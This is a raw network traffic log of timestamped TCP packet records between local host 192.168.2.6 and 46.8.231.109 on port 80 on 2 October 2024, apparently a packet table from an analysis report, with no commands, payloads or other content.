                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.381127119 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.381145000 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.381211996 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.381222963 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.381232023 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.381279945 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.381279945 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.464967966 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.464993000 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.465012074 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.465024948 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.465049028 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.465148926 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.465161085 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.465173006 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.465173006 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.465186119 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.465193033 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.465202093 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.465207100 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.465281963 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.465302944 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.465348959 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.465361118 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.465372086 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.465372086 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.465388060 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.465392113 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.465399981 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.465418100 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.465467930 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.465487957 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.465540886 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.465552092 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.465563059 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.465574980 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.465583086 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.465615034 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.465615034 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.465656042 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.465785027 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.465795994 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.465806007 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.465816021 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.465826988 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.465837955 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.465838909 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.465852022 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.465859890 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.465864897 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.465872049 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466032982 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466043949 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466054916 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466054916 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466067076 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466073990 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466080904 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466093063 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466101885 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466110945 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466120005 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466130972 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466140985 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466321945 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466332912 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466342926 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466346025 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466356993 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466363907 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466370106 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466381073 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466389894 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466392994 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466403961 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466413021 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466415882 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466434002 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466568947 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466578960 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466588020 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466590881 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466603994 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466609955 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466623068 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466641903 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466641903 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466783047 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466794968 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466805935 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466815948 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466826916 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466835976 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466846943 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466846943 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466859102 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466870070 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466877937 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466877937 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466890097 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466928005 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.466928005 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.467082977 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.467093945 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.467106104 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.467116117 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.467125893 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.467137098 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.467145920 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.467148066 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.467160940 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.467181921 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.467181921 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.467269897 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.467281103 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.467291117 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.467324972 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.467361927 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.467374086 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.467392921 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.467436075 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.467497110 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.467509031 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.467519999 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.467539072 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.467544079 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.467544079 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.467560053 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.467571020 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.467580080 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.467582941 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.467602015 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.467634916 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.467756033 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.467767000 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.467777014 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.467787981 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.467798948 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.467809916 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.467819929 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.467819929 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.467829943 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.467870951 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.467870951 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.467956066 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.467968941 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.467982054 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.467991114 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468024969 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468053102 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468116045 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468127966 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468138933 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468148947 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468159914 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468167067 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468172073 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468183994 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468199015 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468250990 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468269110 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468388081 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468399048 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468409061 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468424082 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468436956 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468445063 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468447924 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468461037 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468461990 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468471050 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468481064 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468483925 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468502045 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468669891 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468672991 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468682051 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468693018 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468702078 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468703985 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468715906 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468725920 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468728065 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468728065 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468738079 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468744040 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468805075 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468816042 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468827963 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468841076 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468877077 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468888998 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468899012 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468899012 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468911886 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468921900 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468930960 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468933105 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468955994 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.468955994 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.469145060 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.552548885 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.552567959 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.552577019 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.552654982 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.552659988 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.552670956 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.552681923 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.552690983 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.552700043 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.552707911 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.552738905 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.552767992 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.552778959 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.552808046 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.552808046 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.552824020 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.552836895 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.552872896 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.552891016 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.552901030 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.552911043 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.552983999 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.552987099 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.552998066 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553006887 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553016901 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553025961 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553029060 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553036928 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553090096 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553111076 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553111076 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553128958 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553157091 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553200006 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553209066 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553214073 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553227901 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553237915 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553246021 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553246975 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553267956 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553277016 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553286076 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553309917 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553309917 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553384066 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553422928 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553431988 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553452015 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553456068 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553462029 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553484917 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553544044 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553554058 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553563118 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553569078 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553581953 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553591967 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553616047 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553673983 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553683043 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553692102 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553699970 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553703070 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553714037 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553714991 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553735018 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553751945 CEST5851580192.168.2.646.8.231.109
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553808928 CEST805851546.8.231.109192.168.2.6
                                                                                                                                                                                                                                          Oct 2, 2024 14:43:11.553818941 CEST805851546.8.231.109192.168.2.6
